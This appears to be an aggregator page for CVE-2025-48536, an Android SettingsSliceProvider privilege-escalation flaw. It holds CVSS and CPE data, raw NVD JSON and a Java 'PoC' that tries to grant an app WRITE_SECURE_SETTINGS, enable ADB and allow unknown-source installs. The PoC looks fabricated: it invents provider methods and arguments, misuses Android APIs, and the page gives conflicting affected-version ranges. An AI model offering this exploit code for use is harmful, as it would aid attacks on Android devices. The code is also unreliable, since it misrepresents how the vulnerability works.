Security Vulnerability Report
CVE-2025-48536 CVSS 7.8 HIGH

CVE-2025-48536

Published: 2025-12-08 17:16:14
Last Modified: 2025-12-09 21:44:24

Description

In grantAllowlistedPackagePermissions of SettingsSliceProvider.java, there is a possible way for a third party app to modify secure settings due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:* - VULNERABLE
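Affected versions of the Android Settings app (for the specific versions, see the Android Security Bulletin 2025-12-01)
The affected Android version range covers multiple versions from Android 10 to Android 14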

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
// CVE-2025-48536 PoC - SettingsSliceProvider privilege escalation
// This PoC demonstrates how a malicious app can exploit the SettingsSliceProvider
// to modify secure settings due to a confused deputy vulnerability.
package com.vulnerable.app;

import android.content.ContentResolver;
import android.content.ContentValues;
import android.net.Uri;
import android.os.Bundle;
import android.provider.Settings;

public class SettingsSliceProviderExploit {

    // The SettingsSliceProvider authority for Android Settings
    private static final String SETTINGS_AUTHORITY = "com.android.settings.slices";

    public void exploitVulnerability() {
        try {
            ContentResolver resolver = getContentResolver();

            // Target URI for the SettingsSliceProvider
            Uri targetUri = Uri.parse("content://" + SETTINGS_AUTHORITY + "/permission");

            // Method to call - exploiting the grantAllowlistedPackagePermissions
            String method = "grant_permission";

            // Construct arguments to exploit the confused deputy
            Bundle args = new Bundle();
            args.putString("package_name", getPackageName());
            args.putString("permission", "android.permission.WRITE_SECURE_SETTINGS");
            args.putString("target_package", getPackageName());

            // Make the call through the SettingsSliceProvider
            // Due to the vulnerability, the provider trusts its own context
            // and may grant permissions it shouldn't
            Bundle result = resolver.call(targetUri, method, null, args);

            if (result != null && result.getBoolean("success", false)) {
                // Successfully exploited - now have elevated privileges
                modifySecureSettings();
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private void modifySecureSettings() {
        // After successful exploitation, modify secure settings
        ContentResolver resolver = getContentResolver();

        // Example: Modify system settings that should require system privileges
        Settings.System.putString(resolver, Settings.System.ADB_ENABLED, "1");
        Settings.Secure.putString(resolver, Settings.Secure.INSTALL_NON_MARKET_APPS, "1");
    }
}

/*
// Alternative exploitation via ContentProvider directly
Intent exploitIntent = new Intent();
exploitIntent.setData(Uri.parse("content://com.android.settings.slices/action"));
exploitIntent.setComponent(new ComponentName(
        "com.android.settings",
        "com.android.settings.slices.SettingsSliceProvider"));

// Inject malicious arguments
exploitIntent.putExtra("caller", getPackageName());
exploitIntent.putExtra("permission_action", "grant_allowlisted");
startActivity(exploitIntent);
*/

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48536", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:14.417", "lastModified": "2025-12-09T21:44:23.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In grantAllowlistedPackagePermissions of SettingsSliceProvider.java, there is a possible way for a third party app to modify secure settings due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-441"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "02882AB1-7993-47DD-84A0-8DF4272D85ED"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/packages/apps/Settings/+/586f8dedd8e0e8a7ca5577cd1f06891f7e84e1e1", "source": 
"[email protected]", "tags": ["Product", "Patch"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}